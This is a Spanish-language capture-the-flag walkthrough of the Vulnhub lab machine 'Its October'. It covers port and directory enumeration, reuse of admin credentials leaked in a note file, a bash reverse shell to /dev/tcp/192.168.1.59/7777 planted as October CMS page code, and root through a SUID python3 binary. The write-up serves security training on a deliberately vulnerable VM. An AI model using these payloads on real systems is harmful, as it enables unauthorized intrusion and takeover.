[VULNHUB] Its October

Hoy vamos a hackear la maquina de Vulnhub llamada Its October.Podeis descargarla desde el siguiente enlace: Its October

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.62
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-24 11:11 CEST
Nmap scan report for october.home (192.168.1.62)
Host is up (0.00031s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
|   256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
|_  256 95:1f:32:95:78:08:50:45:cd:8c:7c:71:4a:d4:6c:1c (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Homepage | My new websites
3306/tcp open  mysql   MySQL (unauthorized)
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: My Note
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.94 seconds
Visitamos http://192.168.1.62:8080/ y en el codigo fuente de la pagina aparece:

href="mynote.txt"
Si visitamos la nota en http://192.168.1.62:8080/mynote.txt vemos qu el contenido de la nota es:

user - admin
password - adminadmin2 
Nos guardamos los credenciales :) Lanzamos un gobuster al puerto 80 para ver si encontramos algo interesante.

~ > gobuster -u http://192.168.1.62/ -w 
/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.62/
[+] Threads      : 10
[+] Wordlist     : 
/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2020/08/24 11:15:40 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 200)
/backend (Status: 302)
/config (Status: 301)
/index.php (Status: 200)
/modules (Status: 301)
/plugins (Status: 301)
/server-status (Status: 403)
/storage (Status: 301)
/themes (Status: 301)
/vendor (Status: 301)
=====================================================
2020/08/24 11:17:37 Finished
=====================================================
Vemos que hay un directorio interesante llamado "backend". Lo visitamos y nos pide user y password, usamos los que hemos encontrado antes!

http://192.168.1.62/backend/backend/auth/signin
user: admin
password: adminadmin2
Una vez logueados, vamos a: CMS -> Add -> Code En el codigo ponemos:

function onstart(){
    exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.59/7777 0>&1'");
}
Ponemos un nombre cualquiera a "Filename", ponemos Layout "Default, de titulo ponemos "shell" y le damos a save. Arrancamos el nc y lo ponemos a la escucha.

~ > nc -nlvp 7777
listening on [any] 7777 ...
Con nc a la escucha visitamos http://192.168.1.139/shell

Low Shell


Obtenemos nuestra reverse shell :)

~ > nc -nlvp 7777
listening on [any] 7777 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.62] 44046
bash: cannot set terminal process group (451): Inappropriate ioctl for device
bash: no job control in this shell
www-data@october:/var/www/html/octobercms$ 
Una vez dentro, miramos si hay algun SUID que pueda servirnos para escalar los privilegios.

bash-5.0$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/newgrp
/usr/bin/su
/usr/bin/python3.7m
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/mount
/usr/bin/umount
/usr/bin/python3.7
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
bash-5.0$ 

Privilege Escalation


Vemos que esta python3.7m con SUID, asi que podemos usarlo para conseguir una shell con privilegios!

bash-5.0$ python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
bash-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

proof.txt


Por ultimo, miramos la flag de root!

bash-5.0# cat proof.txt
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq

End


Y con esto ya seriamos root de la maquina.